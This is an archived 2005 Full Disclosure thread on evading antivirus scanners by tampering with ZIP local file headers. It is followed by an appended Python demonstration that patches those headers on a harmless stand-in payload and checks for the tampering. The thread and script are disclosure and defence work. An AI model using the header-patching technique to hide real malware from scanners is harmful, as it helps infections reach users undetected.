Full Disclosure mailing list archives

RE: Re: Multiple AV Vendor IncorrectCRC32BypassVulnerability.


From: "Steve Scholz" <steve_scholz () sybari com>
Date: Sat, 12 Mar 2005 10:33:48 -0500

Sat Mar 12 10:26:35 2005 (4320-4292), "INFORMATION: Internet scan found
virus:

   Folder: SMTP Messages\Internal

   Message: test b

   File: Antigen_b.zip

   Incident: Large uncompressed size

   State: Removed"

The Antigen_s.zip does not contain a valid Eicar; this info, when repaired
and opened, is X5O!P%@AP[4\PZX

We did catch it with a file filter.

Sat Mar 12 10:32:29 2005 (4320-4292), "INFORMATION: Internet scan found
virus:

   Folder: SMTP Messages\Internal

   Message: Fw: test

   File: Antigen_s.zip->eicar.com

   Incident: FILE FILTER=  *.com

   State: Removed"

What was your intent with these files?

Steve Scholz
Corporate Sales Engineer-North America
Sybari Software, Inc.
631-630-8556 Direct
516-903-2464 Mobile

Email:  Steve_scholz () sybari com

MSN IM: Steve_Scholz () Msn com (email never checked)

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk
[mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of bipin
gautam
Sent: Saturday, March 12, 2005 2:58 AM
To: Steve Scholz; vuln () secunia com
Cc: full-disclosure () lists grok org uk; vuldb () securityfocus com
Subject: RE: [Full-disclosure] Re: Multiple AV Vendor
IncorrectCRC32BypassVulnerability.


While it might be a vulnerability, if the file is
extracted, which it has to be to be executed, the
desktop scanner will detect it at that time.
Multiple layers of defense are your best option.
As far as number 3, Antigen detects Eicar.

Yap, I never reported Antigen vulnerable to the 3rd
one.

Though, in the local file header, if you modify the "general
purpose bit flag" (7th & 8th bytes of a zip archive)
with \x2f, Antigen also seems to be vulnerable! While
most unzip utilities are transparently able to extract
SUCH* an archive without any problem! Though, currently my
only source of verifying this is via
www.virustotal.com and some others. [Go, TRY IT
THERE!]
http://www.geocities.com/visitbipin/gpbf.zip


I can see if there is anything else that you do not
think Antigen is doing correctly.

 (O;

For instance,
in the "local file header" & "data descriptor", if you
change the compressed size and uncompressed size to
ZERO [iDEFENSE], or to greater than the actual file size, or
to less than the actual file size, there are still many AV
that can't scan the file properly.
http://www.geocities.com/visitbipin/Antigen_b.zip
http://www.geocities.com/visitbipin/Antigen_s.zip

Moreover, there are unzip utilities that go into a loop
if the filesize is changed to ffffffff! Let's hope AV
don't have such faulty code!

Just run the file through www.virustotal.com and
you'll see. (I know, they aren't using an up-to-date scan
engine.)

Thanks,
bipin





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/


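The header manipulations described in the quoted message above (compressed and uncompressed sizes in the local file header set to zero or to a wrong value, or the general purpose bit flag overwritten, while the central directory is left intact) as an added, runnable example. This is not code from either poster nor from any vendor or scanner named in the thread. It is Python; the payload is a constructed harmless marker standing in for the EICAR file, `naive_local_header_scan` is a model of a parser that trusts the local header (not any product's engine), and `header_consistency_findings` is the cross-check a scanner can do: compare each local header against its central directory record, allowing zero sizes only when bit 3 (data descriptor) is set.

```python
import io
import struct
import zipfile
import zlib

# Constructed stand-in for the EICAR test string, so this file is not itself flagged.
PAYLOAD = b"HARMLESS-MARKER-STANDING-IN-FOR-EICAR"
ENTRY_NAME = "eicar.com"

LOCAL_SIG = b"PK\x03\x04"
# Local file header: sig, version, flags, method, time, date, crc32, csize, usize, fnlen, exlen
LOCAL_FMT = "<4sHHHHHIIIHH"
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes
OFF_FLAGS, OFF_CSIZE, OFF_USIZE = 6, 18, 22   # 7th/8th bytes are the general purpose bit flag
FLAG_DATA_DESCRIPTOR = 0x0008                 # bit 3: sizes/crc legitimately zero, real values follow the data


def build_zip(payload: bytes, name: str = ENTRY_NAME) -> bytes:
    """Well-formed single-entry archive whose local and central records agree."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def patch_local_header(archive: bytes, name: str = ENTRY_NAME, *,
                       flags=None, csize=None, usize=None) -> bytes:
    """Rewrite selected fields of one entry's *local* header only.

    The central directory is untouched, which is what lets unzip tools that
    trust the central directory extract the doctored archive transparently.
    """
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        off = zf.getinfo(name).header_offset
    data = bytearray(archive)
    assert data[off:off + 4] == LOCAL_SIG
    if flags is not None:
        struct.pack_into("<H", data, off + OFF_FLAGS, flags)
    if csize is not None:
        struct.pack_into("<I", data, off + OFF_CSIZE, csize)
    if usize is not None:
        struct.pack_into("<I", data, off + OFF_USIZE, usize)
    return bytes(data)


def naive_local_header_scan(archive: bytes) -> list:
    """Model of a scanner that walks local headers and trusts their size fields.

    Returns the inflated blobs it would hand to a signature engine. A header that
    claims 0 compressed bytes yields nothing to inflate, a truncated blob fails to
    inflate and is skipped, and a bogus csize also derails the walk to the next entry.
    """
    seen = []
    pos = 0
    while archive[pos:pos + 4] == LOCAL_SIG:
        (_, _, _flags, method, _, _, _crc, csize, _usize,
         fnlen, exlen) = struct.unpack_from(LOCAL_FMT, archive, pos)
        start = pos + LOCAL_LEN + fnlen + exlen
        blob = archive[start:start + csize]
        try:
            seen.append(zlib.decompress(blob, -15) if method == zipfile.ZIP_DEFLATED else blob)
        except zlib.error:
            pass  # nothing usable to scan
        pos = start + csize
    return seen


def extract_via_central_directory(archive: bytes, name: str = ENTRY_NAME) -> bytes:
    """What most unzip tools (and Python's zipfile) do: sizes and CRC come from the
    central directory record, so the doctored local header copy is simply ignored."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(name)


def header_consistency_findings(archive: bytes) -> list:
    """Cross-check each local header against its central directory record.

    Zero local sizes/CRC are legitimate only when bit 3 (data descriptor) is set;
    any other disagreement marks the archive as suspect rather than trusting either copy.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            (_, _, flags, _, _, _, crc, csize, usize,
             _, _) = struct.unpack_from(LOCAL_FMT, archive, info.header_offset)
            deferred = bool(flags & FLAG_DATA_DESCRIPTOR)
            for label, local, central in (("general purpose flags", flags, info.flag_bits),
                                          ("crc32", crc, info.CRC),
                                          ("compressed size", csize, info.compress_size),
                                          ("uncompressed size", usize, info.file_size)):
                if local != central and not (deferred and local == 0):
                    findings.append(f"{info.filename}: local {label} {local:#x} != central {central:#x}")
    return findings


if __name__ == "__main__":
    good = build_zip(PAYLOAD)
    variants = (("clean", good),
                ("zero sizes [iDEFENSE case]", patch_local_header(good, csize=0, usize=0)),
                ("flags overwritten with 0x2f2f", patch_local_header(good, flags=0x2F2F)))
    for label, arc in variants:
        print(f"{label}: naive scanner saw payload: {PAYLOAD in naive_local_header_scan(arc)}; "
              f"central-directory extract ok: {extract_via_central_directory(arc) == PAYLOAD}; "
              f"findings: {header_consistency_findings(arc)}")
```

Running the script shows the asymmetry the thread is about: the zero-size variant still extracts correctly through the central directory while the local-header-trusting model scans nothing, and the consistency check reports both size fields as disagreeing. The bit 3 allowance matters in practice, since streamed archives legitimately leave the local sizes and CRC at zero, so a check that flags every zero would drown in false positives; the tell is a zero (or other) value that disagrees with the central directory when bit 3 is clear.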
